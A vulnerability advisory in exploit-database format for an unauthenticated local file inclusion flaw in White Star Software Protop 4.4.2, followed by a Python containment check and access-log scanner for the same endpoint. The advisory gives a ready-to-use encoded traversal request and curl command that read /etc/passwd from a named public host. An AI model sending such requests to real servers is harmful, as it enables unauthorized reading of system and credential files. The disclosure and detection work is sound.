
34 lines
No EOL
1.1 KiB
Text
# Exploit Title: White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI)
# Date: 2025-07-09
# Exploit Author: Imraan Khan (Lich-Sec)
# Vendor Homepage: https://wss.com/
# Software Link: https://client.protop.co.za/
# Version: v4.4.2-2024-11-27
# Tested on: Ubuntu 22.04 / Linux
# CVE: CVE-2025-44177
# CWE: CWE-22 - Path Traversal

# Description:
# A Local File Inclusion vulnerability exists in White Star Software Protop v4.4.2.
# An unauthenticated remote attacker can retrieve arbitrary files via
# URL-encoded traversal sequences in the `/pt3upd/` endpoint.

# Vulnerable Endpoint:
GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: client.protop.co.za
User-Agent: curl/8.0
Accept: */*

# Example curl command:
curl -i 'https://client.protop.co.za/pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd'

# Notes:
# - Vulnerability confirmed on public instance at time of testing.
# - CVSS v3.1 Base Score: 8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N)
# - The vendor was notified and a fix was issued.

# Disclosure Timeline:
# - Discovered: 2025-03-13
# - Disclosed to vendor: 2025-03-20
# - CVE Assigned: 2025-07-01
# - Public Disclosure: 2025-07-09
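As an added defender-side example, not part of this advisory or of Protop's own code: a containment check for a `/pt3upd/`-style file handler that percent-decodes the request path before verifying it stays under the update directory (the defect class behind CWE-22 here), plus a scan of access-log lines for plain or encoded traversal sequences aimed at that endpoint. The update root, the log lines and the assumption that legitimate update file names contain no literal `%` are all constructed here.

```python
import os
import re
from typing import List, Optional
from urllib.parse import unquote

# Constructed directory for the /pt3upd/ handler (an assumption, not the real Protop path).
UPDATE_ROOT = "/srv/protop/pt3upd"
PREFIX = "/pt3upd/"

def resolve_update_path(root: str, request_path: str) -> Optional[str]:
    """Map a /pt3upd/ request path to a file under root, or return None.
    The path is percent-decoded once, so '..%2f' becomes '../' before the
    containment check; a second encoding layer ('%252e') is rejected outright."""
    if not request_path.startswith(PREFIX):
        return None
    decoded = unquote(request_path[len(PREFIX):])
    # Reject null bytes and any encoding that survived one decode (double encoding).
    if "\x00" in decoded or re.search(r"%[0-9a-fA-F]{2}", decoded):
        return None
    root_abs = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_abs, decoded.lstrip("/")))
    # Containment: the resolved path must be the root itself or sit below it.
    if candidate != root_abs and not candidate.startswith(root_abs + os.sep):
        return None
    return candidate

# Plain or percent-encoded '..' followed by a forward or back slash, encoded or not.
TRAVERSAL_RE = re.compile(r"(?:\.\.|%2e%2e)(?:/|\\|%2f|%5c)", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/')

def find_traversal_requests(access_log: str) -> List[str]:
    """Return request targets under /pt3upd/ that carry a traversal sequence."""
    hits = []
    for line in access_log.splitlines():
        m = REQUEST_RE.search(line)
        if m and m.group(1).startswith(PREFIX) and TRAVERSAL_RE.search(m.group(1)):
            hits.append(m.group(1))
    return hits

# Constructed access-log lines; the second mirrors the request shown in the advisory.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [09/Jul/2025:10:01:02 +0000] "GET /pt3upd/patches/latest.zip HTTP/1.1" 200 5120 "-" "curl/8.0"
203.0.113.5 - - [09/Jul/2025:10:01:09 +0000] "GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1847 "-" "curl/8.0"
198.51.100.7 - - [09/Jul/2025:10:02:00 +0000] "GET /static/logo.png HTTP/1.1" 200 910 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    print("resolved:", resolve_update_path(UPDATE_ROOT, "/pt3upd/patches/latest.zip"))
    print("blocked:", resolve_update_path(UPDATE_ROOT, "/pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd"))
    print("suspicious requests:", find_traversal_requests(SAMPLE_ACCESS_LOG))
```

The log scan flags the encoded request even though the server answered it with a 200, which is the signal a WAF or SIEM rule for this endpoint should key on.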